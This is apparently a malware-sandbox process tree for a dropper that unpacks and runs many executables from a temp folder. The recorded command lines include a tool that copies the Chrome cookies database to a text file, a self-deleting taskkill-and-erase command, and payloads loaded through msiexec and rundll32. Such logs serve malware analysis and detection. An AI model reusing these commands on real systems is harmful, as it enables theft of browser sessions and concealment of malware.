C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu110155a356f.exeThu110155a356f.exe4⤵
- Executes dropped EXE
PID:2988 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /y .\62XW.NZd5⤵PID:2300
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1179364c94e82.exe3⤵PID:2132
-
C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu1179364c94e82.exeThu1179364c94e82.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2028 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2028 -s 12165⤵
- Program crash
PID:4084
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu11a637868f8aa.exe3⤵PID:3768
-
C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11a637868f8aa.exeThu11a637868f8aa.exe4⤵
- Executes dropped EXE
PID:3032 -
C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11a637868f8aa.exe"C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11a637868f8aa.exe" -u5⤵
- Executes dropped EXE
PID:1616
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu11f7717aa35a4ea.exe3⤵PID:1000
-
C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11f7717aa35a4ea.exeThu11f7717aa35a4ea.exe4⤵
- Executes dropped EXE
PID:1424
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu11307f0493.exe3⤵PID:1836
-
C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11307f0493.exeThu11307f0493.exe4⤵
- Executes dropped EXE
PID:3096 -
C:\Users\Admin\AppData\Local\Temp\is-HDS5J.tmp\Thu11307f0493.tmp"C:\Users\Admin\AppData\Local\Temp\is-HDS5J.tmp\Thu11307f0493.tmp" /SL5="$101FC,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11307f0493.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:436 -
C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11307f0493.exe"C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11307f0493.exe" /SILENT6⤵PID:1064
-
C:\Users\Admin\AppData\Local\Temp\is-LQTF9.tmp\Thu11307f0493.tmp"C:\Users\Admin\AppData\Local\Temp\is-LQTF9.tmp\Thu11307f0493.tmp" /SL5="$20216,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11307f0493.exe" /SILENT7⤵PID:1976
-
C:\Users\Admin\AppData\Local\Temp\is-QK4FN.tmp\windllhost.exe"C:\Users\Admin\AppData\Local\Temp\is-QK4FN.tmp\windllhost.exe" 778⤵PID:2168
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu11f281fb2df.exe3⤵PID:1476
-
C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11f281fb2df.exeThu11f281fb2df.exe4⤵
- Executes dropped EXE
PID:2876 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:2004
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu11f106a00ed17759.exe3⤵PID:2424
-
C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11f106a00ed17759.exeThu11f106a00ed17759.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1588 -
C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11f106a00ed17759.exeC:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11f106a00ed17759.exe5⤵PID:3316
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu11cf387a29397511.exe /mixtwo3⤵PID:1372
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11cf387a29397511.exeThu11cf387a29397511.exe /mixtwo1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:844 -
C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11cf387a29397511.exeThu11cf387a29397511.exe /mixtwo2⤵
- Executes dropped EXE
PID:3784 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Thu11cf387a29397511.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11cf387a29397511.exe" & exit3⤵PID:3208
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Thu11cf387a29397511.exe" /f4⤵
- Kills process with taskkill
PID:2452
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4228 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:4256
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4396